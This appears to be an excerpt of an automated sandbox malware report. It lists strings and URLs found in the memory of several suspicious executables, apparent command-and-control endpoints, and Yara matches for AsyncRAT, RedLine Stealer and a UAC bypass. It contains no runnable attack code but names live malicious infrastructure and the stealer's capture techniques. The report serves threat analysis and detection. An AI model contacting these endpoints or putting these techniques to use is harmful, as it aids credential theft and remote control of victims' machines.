Source: dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: loqVSeJ.exe, 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000027.00000002.2954989748.0000000006144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 7fOMOTQ.exe, 0000002C.00000003.2766226115.0000000000C63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/
Source: 7fOMOTQ.exe, 0000002C.00000003.2834330957.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3072843233.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2852240176.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3097199131.000000000546E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2839684470.000000000546A000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2854506225.0000000005470000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2949322713.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2765671512.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2852690392.000000000546D000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3072475076.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3101072477.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3066969796.000000000546A000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3072843233.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/api
Source: 7fOMOTQ.exe, 0000002C.00000003.3072475076.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/api3
Source: 7fOMOTQ.exe, 0000002C.00000003.2834330957.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apiB$
Source: 7fOMOTQ.exe, 0000002C.00000003.2833826775.0000000005466000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2834216727.000000000546D000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2832891484.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apiMSwhVz
Source: 7fOMOTQ.exe, 0000002C.00000003.2852240176.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2839684470.000000000546A000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2852690392.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apiQQ8Ekw
Source: 7fOMOTQ.exe, 0000002C.00000003.3066969796.000000000546A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apice
Source: 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apife
Source: 7fOMOTQ.exe, 0000002C.00000003.3072843233.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apil
Source: 7fOMOTQ.exe, 0000002C.00000003.3066969796.000000000546A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apis
Source: 7fOMOTQ.exe, 0000002C.00000003.2833826775.0000000005466000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2834216727.000000000546D000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2832891484.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apisbc2v36
Source: 7fOMOTQ.exe, 0000002C.00000003.3072843233.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3101072477.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/sj
Source: 7fOMOTQ.exe, 0000002C.00000003.3072843233.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com:443/apiPackages
Source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199824159981
Source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199824159981a110mgzMozilla/5.0
Source: dfd80aba08.exe, 00000007.00000003.2274431056.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2643660441.0000000005995000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816726350.00000000054C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dfd80aba08.exe, 00000007.00000003.2274824561.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2293949368.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2274431056.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2643660441.0000000005993000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2662722605.0000000005947000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2644139298.0000000005947000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2833602323.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2834418800.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816726350.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816883741.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2830794362.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: dfd80aba08.exe, 00000007.00000003.2274824561.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2644139298.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816883741.0000000005496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: dfd80aba08.exe, 00000007.00000003.2274824561.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2293949368.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2274431056.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2643660441.0000000005993000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2662722605.0000000005947000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2644139298.0000000005947000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2833602323.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2834418800.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816726350.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816883741.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2830794362.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: dfd80aba08.exe, 00000007.00000003.2274824561.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2644139298.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2816883741.0000000005496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Bjkm5hE.exe, 0000002B.00000003.2728784820.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2704170598.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2704170598.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2704376589.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2704170598.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2743789282.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tn
Source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tna110mgzMozilla/5.0
Source: Bjkm5hE.exe, 0000002B.00000003.2704170598.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2745240367.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2704170598.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2704376589.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 0000002B.00000003.2743789282.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Macromedia.com, 00000016.00000003.2407646479.00000000038DD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2961442078.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043336059.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com.22.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: dfd80aba08.exe, 00000007.00000003.2253649019.000000000151D000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2253551452.0000000001545000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2253527463.0000000001592000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2765512541.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2765671512.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: dfd80aba08.exe, 00000023.00000003.2852645964.0000000001154000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learniH
Source: dfd80aba08.exe, 00000007.00000003.2253551452.0000000001545000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2253527463.0000000001592000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2765512541.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2765671512.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: dfd80aba08.exe, 00000023.00000003.2732360381.000000000590E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2918201405.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2931860537.0000000005468000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2943667526.000000000546D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: AchillesGuard.com.22.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: dfd80aba08.exe, 00000007.00000003.2268465392.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2268561411.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2640052370.0000000005939000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2635925790.000000000593B000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798314659.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2800689696.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2798461474.00000000054AC000.00000004.00000800.00020000.00000000.sdmp, tmpACDF.tmp.36.dr, tmpBECA.tmp.36.dr, tmp8FCA.tmp.36.dr, tmpAB76.tmp.36.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: dfd80aba08.exe, 00000007.00000003.2312170407.0000000005D92000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2728794533.0000000005B14000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dfd80aba08.exe, 00000007.00000003.2312170407.0000000005D92000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2728794533.0000000005B14000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2877584067.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 3300, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

9_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe

Code function: 23_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

23_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe

Code function: 23_2_004391E0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

23_2_004391E0

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_004044D1

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_2916.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 56.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 57.2.8b3fbc1053.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.5a4a47dccd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Macromedia.com PID: 3300, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: loqVSeJ.exe PID: 2692, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: powershell.exe PID: 2916, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: e6710ad235.exe.6.dr	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_85f6e54e-1
Source: e6710ad235.exe.6.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 